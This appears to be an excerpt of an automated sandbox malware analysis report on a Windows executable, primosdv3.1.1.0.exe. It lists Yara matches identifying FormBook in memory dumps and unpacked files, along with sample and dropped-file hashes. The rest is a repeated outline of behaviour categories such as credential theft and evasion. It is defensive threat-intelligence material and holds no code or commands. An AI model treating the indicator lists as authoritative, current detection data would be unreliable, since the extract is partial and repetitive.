Source: Yara match	File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED

ID:	715075
Product:	CloudBasic
Start time:	15:57:46
Start date:	03.10.2022
Sample:	primosdv3.1.1.0.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	633bb3ab12d6fd7b6956aa3a93f55e9c
SHA1:	f4a72da6391fcc9c623ae26de27fc80f10cf9f2b
SHA256:	0b504e6f2a283de75673bbe913c5032b02cc6a92888f4dfab895f79104b11103
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\F61A.tmp	PE32 executable (GUI) Intel 80386, for MS Windows	76EA697ED6A45562B791C6DE86E32587	86386F7A910A1589E2BB13E40E406DA7D0E8EB04	336D76467E148CAF61A2F4755B72A2197A61DE80576A315DA678F45EF381C635
C:\Users\user\AppData\Local\Temp\bstkiooen.exe	PE32 executable (GUI) Intel 80386, for MS Windows	A2AF309781DF2F75DC0B57AE63B0F3A9	F4137068334E1856471F4701C96AFAA0470C7D4C	328F2A0D53ED5C36513F278F32A0D6166A2DC0993ED4F52185198D6200595E1C
C:\Users\user\AppData\Local\Temp\hbmpmcwm.tfz	data	B02C99ECFDB7D8793254BC8E9C003869	E38CA7FF9C88E36D19AA0198820B97F6A11DE201	2F8EB57267950A4BC6E8DD8B2D7DEF8AFC40B8DB3C5EF49ADC68FB144F7E8E41
C:\Users\user\AppData\Local\Temp\hgmxh.brz	data	73D355A9E88D7A82F69E612949EB4965	B6041F58669A65E43FBE8DCBA0DBD061E48812BC	115814A83166723CE7080D92AF30822DBD7DC2D5D26EDEC9145B056B7226E166

Windows Analysis Report
primosdv3.1.1.0.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report primosdv3.1.1.0.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
primosdv3.1.1.0.exe